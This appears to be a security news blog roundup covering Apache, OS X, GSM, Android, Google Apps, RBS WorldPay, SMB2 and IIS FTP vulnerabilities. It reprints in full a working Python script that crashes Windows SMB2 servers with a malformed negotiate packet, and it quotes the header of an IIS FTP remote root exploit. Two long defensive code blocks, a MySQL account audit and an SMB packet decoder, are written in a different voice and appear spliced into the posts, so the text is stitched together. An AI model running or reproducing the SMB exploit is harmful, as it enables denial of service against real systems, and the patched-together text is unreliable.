There was a new vulnerability announced today in the Apache web server. It affects all versions of the popular web server platform running on Windows operating systems.

From ZDNet Australia:

“The vulnerability means that you can take complete control of the web server remotely with system privileges — which is the highest privilege on Windows,” Edelstein told ZDNet.com.au. “An attacker could gain access to, modify and take away data.”

Edelstein advised users running Apache on Windows platforms to upgrade immediately as users have no way of knowing if their web servers have been compromised. The company’s security advisory can be accessed here.

“Whilst in the past it was more overt and attackers would deface website pages, they’re more likely now to conceal their access to maintain their foothold,” said Edelstein, giving examples of attackers potentially exploiting the vulnerability by placing hidden pieces of code to capture credit card details from online transactions and install root kits on compromised websites.

Although I do find it odd that people would be running Apache on Windows for anything other than a lab instance. But that’s just me.

Article Link

(Image used under CC from Hans Gerwitz)

This was an email that Adobe sent to one of our readers just yesterday. Too funny, especially when you bear in mind this and of course these. Not to mention the fun with TSA just a little while ago.

Enjoy your Friday.

:)

Thanks to hvnsnt for sharing that one. Here is a larger copy of the image. Just click on the thumbnail.

Here is an interesting one. Apparently a vulnerability that was reported roughly 8 months ago still haunts OS X.

From ITWire:

A widespread security vulnerability disclosed eight months ago is apparently still lurking in Mac OS X 10.5 and 10.6. A pair of security researchers have released a proof of concept exploit.

Maksymilian Arciemowicz and ’sp3x’ of SecurityReason.com have publicly disclosed a proof of concept exploit for a vulnerability in Mac OS X’s dtoa function that converts double-precision values to ASCII strings.

They say they reported the issue eight months ago.

The proof of concept merely triggers a memory access error, but such buffer overflow conditions can sometimes be exploited to run arbitrary code.

Hmm. Arbitrary code you say? That sounds less than appealing.

Read on.

Article Link

(Image used under CC from photograham Flickr stream)

There is this damn breathing noise I hear on the line every time I make a phone call from my cell.

What’s that? It was Paget and Nohl?

…oh!

From The Register:

At a hacker conference in Berlin that runs through Wednesday, the cryptographers said they’ve cracked the algorithm that determines the random channel hopping and have devised a practical means to capture entire calls using equipment that costs about $4,000. At the heart of the crack is open-source software for computer-controlled radios that makes the frequency changes at precisely the same time, and in the same order, that the cellphone and base station do.

“We now know this is possible,” said Karsten Nohl, a 28-year-old cryptographer and one of the members of an open-source project out to prove that GSM, the technical standard used by about 80 percent of the mobile market, can’t be counted on to keep calls private. The attack “is practical, and there are real vulnerabilities that people are exploiting.”

Ouch!

Yet another reason on the long list of “Why the hell am I not in Berlin?”.

For the full article read on.

Article Link

Also, here’s where you can find a copy of the presentation at 26c3. And yes, the video of the preso is available on torrent sites. 1 2 and 3


There are a couple of problems with the Android phone in the news this evening. The first concerns how Android processes SMS messages.

Hmm. Why does this one ring a bell?

From oCERT:

a specific malformed SMS message can be crafted to trigger a condition that disconnects the mobile phone from the cellular network. The malformed SMS message consists of a badly formatted WAP Push message which causes a Java ArrayIndexOutOfBoundsException in the phone application (android.com.phone).

The other problem involves a denial of service problem with the Dalvik API.

A specific malicious application can be crafted so that if it is downloaded and executed by the user, it would trigger the vulnerable API function and restart the system process. The same condition could occur if a developer unintentionally places the vulnerable function in a place where the execution path leads to that function call. Triggering this bug is considered a DoS condition.

Congrats to researchers Charlie Miller, Collin Mulliner and Emmanouel Kellinis. Patches have been released by the vendor for both of these issues.


Ah, it’s raining in Mountain View today. Well, at least in one building. It turns out that there is a vulnerability in Google Apps that can lead to a local compromise of a user’s system. Apparently, this can lead to non-privileged code execution.

Um, yeah.

From retrogod:

google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (Internet Explorer)
by nine:situations:group::pyrokinesis
site: http://retrogod.altervista.org/

software site: http://pack.google.com/intl/it/pack_installer.html

tested against: Internet Explorer 8, windows xp sp3
Internet Explorer 7, windows xp sp3
Google Chrome 2.0.172.43

vulnerability: through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as follows:

There is a proof of concept on the site as well.

Doesn’t really give folks in Los Angeles a warm and fuzzy, one would imagine.


Royal Bank of Scotland Group might be feeling a bit exposed this afternoon…

RBS WorldPay, a system that processes millions of payments daily, has been compromised. It looks like the database is just dying to give up names, credit card numbers, email addresses and all sorts of juicy information to whoever asks for it. Unu has a great write-up of the vulnerability with plenty of juicy screenshots on his blog.

Here is a real kicker for you:

The next picture is awesome, but really what we see. In the picture appear user, host and password in the mysql database, user table. But look well at the first user webphp, which I surrounded. We have % for host and NOTHING in the password!!! I mean we have a user with password NULL and % for host, which means that we can log on to his account on the MySQL server without a password, from any IP.
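The check a DBA would run to catch exactly the condition Unu describes, an account in mysql.user with Host set to % and an empty password, as an added example (my code, not Unu’s write-up or anything from RBS WorldPay). It loads constructed sample rows into an in-memory SQLite table that mirrors the Host, User and Password columns of the MySQL 5.0/5.1 grant table, runs the audit query, and returns the remediation statements for each flagged account. The user names and hash strings are made up; the SET PASSWORD and RENAME USER statements are MySQL 5.x syntax (MySQL 5.7 and later keep the hash in authentication_string and use ALTER USER instead).

```python
import sqlite3

# Constructed sample of the MySQL 5.x grant table (mysql.user). The hash strings
# are placeholders, not real password hashes. The "webphp" row reproduces the
# condition in the post: Host = '%' and an empty Password.
SAMPLE_USER_ROWS = [
    ("localhost", "root", "*PLACEHOLDER_HASH_ROOT"),
    ("%", "webphp", ""),
    ("10.0.0.%", "report", "*PLACEHOLDER_HASH_REPORT"),
    ("%", "backup", "*PLACEHOLDER_HASH_BACKUP"),
    ("localhost", "legacy", None),
]

# The audit query itself. The same statement runs unchanged against a MySQL 5.x
# mysql.user table (on 5.7+ substitute authentication_string for Password).
AUDIT_SQL = """
SELECT Host, User,
       CASE WHEN Password IS NULL OR Password = '' THEN 1 ELSE 0 END AS empty_password,
       CASE WHEN Host = '%' THEN 1 ELSE 0 END AS any_host
FROM user
WHERE Password IS NULL OR Password = '' OR Host = '%'
ORDER BY empty_password DESC, any_host DESC, User
"""


def audit_accounts(rows):
    """Load the rows into an in-memory table and return the risky accounts,
    worst first, as dicts carrying a severity label."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (Host TEXT, User TEXT, Password TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?, ?)", rows)
    findings = []
    for host, user, empty_pw, any_host in db.execute(AUDIT_SQL):
        if empty_pw and any_host:
            severity = "critical"   # passwordless login from any address
        elif empty_pw:
            severity = "high"       # passwordless, but host-restricted
        else:
            severity = "medium"     # password set, but reachable from anywhere
        findings.append({
            "host": host,
            "user": user,
            "empty_password": bool(empty_pw),
            "any_host": bool(any_host),
            "severity": severity,
        })
    db.close()
    return findings


def remediation_sql(findings):
    """MySQL 5.x statements that fix each finding (returned as text, not executed).
    The angle-bracket values are placeholders for the operator to fill in."""
    statements = []
    for f in findings:
        account = "'%s'@'%s'" % (f["user"], f["host"])
        if f["empty_password"]:
            statements.append(
                "SET PASSWORD FOR %s = PASSWORD('<new strong password>');" % account)
        if f["any_host"]:
            statements.append(
                "RENAME USER %s TO '%s'@'<application host>';" % (account, f["user"]))
    return statements


if __name__ == "__main__":
    found = audit_accounts(SAMPLE_USER_ROWS)
    for f in found:
        print("%-8s %s@%s  empty_password=%s any_host=%s"
              % (f["severity"], f["user"], f["host"], f["empty_password"], f["any_host"]))
    print("\n".join(remediation_sql(found)))
```

The ordering in the query puts the webphp-style account (no password, any host) at the top, so the first line of output is the one to act on before anything else.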


There is also some fun poked at Bill Gates which never hurts.

Article Link


You know, sometimes you just have to laugh as the pain gets to be too much.

From Full Disclosure:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.

The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it’s used to identify the SMB dialect that will be used for further communication.

Oh, but there’s more. Proof of concept anyone?

Yup, got that as well over on FD.

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()

s.connect(host)
s.send(buff)
s.close()
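An added, defensive counterpart to the script above (my code, not part of the Full Disclosure post or Smb-Bsod.py): a Python 3 decoder that walks the same negotiate request byte for byte, the NetBIOS session header, the 32-byte SMB header and the dialect list, and reports the non-zero Process ID High field the script sets. Run over captured port 445 traffic, this is the shape of a detection rule for the malformed request; it never opens a socket. The field names follow the SMB1 header layout (Protocol, Command, Status, Flags, Flags2, PIDHigh, SecurityFeatures, Reserved, TID, PIDLow, UID, MID), in which the bytes the script comments as “Operation 0x18 & sub 0xc853” are the Flags and Flags2 fields. The packet bytes are copied from the script; everything else here is this example’s own.

```python
import struct

# The negotiate request from Smb-Bsod.py, NetBIOS session header included,
# embedded so the decoder runs offline.
NEGOTIATE_PDU = (
    b"\x00\x00\x00\x90"  # NetBIOS session message, length 0x90 = 144
    b"\xff\x53\x4d\x42"  # protocol id "\xffSMB"
    b"\x72\x00\x00\x00"  # command 0x72 (NEGOTIATE), start of Status
    b"\x00\x18\x53\xc8"  # end of Status, Flags 0x18, Flags2 0xc853
    b"\x00\x26"          # PIDHigh: the "&" byte the script calls out
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)

SMB_COM_NEGOTIATE = 0x72
# 32-byte SMB1 header, little-endian: Protocol, Command, Status, Flags, Flags2,
# PIDHigh, SecurityFeatures, Reserved, TID, PIDLow, UID, MID
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")


def parse_negotiate(pdu):
    """Decode a NetBIOS-framed SMB1 NEGOTIATE request. Every length in the
    packet is cross-checked against the bytes actually present; any
    inconsistency raises ValueError rather than being trusted."""
    if len(pdu) < 4:
        raise ValueError("truncated NetBIOS session header")
    if pdu[0] != 0x00:
        raise ValueError("not a NetBIOS session message (type 0x%02x)" % pdu[0])
    body = pdu[4:]
    declared = int.from_bytes(pdu[1:4], "big")
    if declared != len(body):
        raise ValueError("NetBIOS length %d != payload length %d" % (declared, len(body)))
    if len(body) < SMB_HEADER.size + 3:
        raise ValueError("payload too short for SMB header plus WordCount/ByteCount")
    (proto, command, status, flags, flags2, pid_high, _sig, _reserved,
     tid, pid_low, uid, mid) = SMB_HEADER.unpack_from(body, 0)
    if proto != b"\xffSMB":
        raise ValueError("bad protocol id %r" % proto)
    if command != SMB_COM_NEGOTIATE:
        raise ValueError("not a NEGOTIATE request (command 0x%02x)" % command)
    word_count = body[SMB_HEADER.size]
    bc_offset = SMB_HEADER.size + 1 + 2 * word_count
    if bc_offset + 2 > len(body):
        raise ValueError("WordCount runs past the end of the packet")
    (byte_count,) = struct.unpack_from("<H", body, bc_offset)
    data = body[bc_offset + 2:]
    if len(data) != byte_count:
        raise ValueError("ByteCount %d != %d bytes of dialect data" % (byte_count, len(data)))
    # Dialect list: repeated (BufferFormat 0x02, NUL-terminated ASCII string).
    dialects, i = [], 0
    while i < len(data):
        if data[i] != 0x02:
            raise ValueError("dialect entry at offset %d lacks BufferFormat 0x02" % i)
        end = data.find(b"\x00", i + 1)
        if end < 0:
            raise ValueError("unterminated dialect string")
        dialects.append(data[i + 1:end].decode("ascii"))
        i = end + 1
    return {"status": status, "flags": flags, "flags2": flags2, "pid_high": pid_high,
            "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid, "dialects": dialects}


def anomalies(info):
    """What a detection rule would flag in a decoded negotiate request."""
    findings = []
    if info["pid_high"] != 0:
        findings.append("ProcessIDHigh=0x%04x; a negotiate request normally carries 0"
                        % info["pid_high"])
    if "SMB 2.002" in info["dialects"]:
        findings.append("client offers the SMB 2.002 dialect, so the request reaches the "
                        "SMB2 negotiate path (SRV2.SYS, per the post)")
    return findings


if __name__ == "__main__":
    decoded = parse_negotiate(NEGOTIATE_PDU)
    print("dialects:", decoded["dialects"])
    for finding in anomalies(decoded):
        print("finding:", finding)
```

Note that the decoder refuses the packet as soon as a declared length disagrees with the bytes present, which is the opposite of what the post says SRV2.SYS did with the header field.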

Article Link

UPDATE: Here is some more info on this from the site Reverse Mode.

(Image used under CC from ian-s Flickr feed)

This Monday continues to get weirder by the minute. Well, in keeping with that, here is a zero-day that just made it onto the Full Disclosure mailing list.

Microsoft Internet Information Server 5.0/6.0
FTP Server Remote Stack Based Overrun
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;

The full exploit is posted to the site as a PDF file, and for those who are unsure, here is the VirusTotal scan of the file. Bear in mind that this is by no means a guarantee of its safety.

Article Link

[UPDATE]: Microsoft released a workaround for this problem today (Sept. 1, 2009)



As noticed by one of our loyal readers – thanks ax0n!

Yes, the ad server puts up all kinds of ads, up to and including full flash ads. And we LOVE our advertisers.

And yes, we hope y’all are enjoying the schadenfreude of the situation.

I’m down to counting HOURS until departure for Blackhat / SecurityBSides / Neighborcon / DEFCON / ZOMG!VEGAS!!!!1!!!

Hope to see you all there – note that there is a ton of LSD shwag this year, so it would be good to memorize the faces on the About page.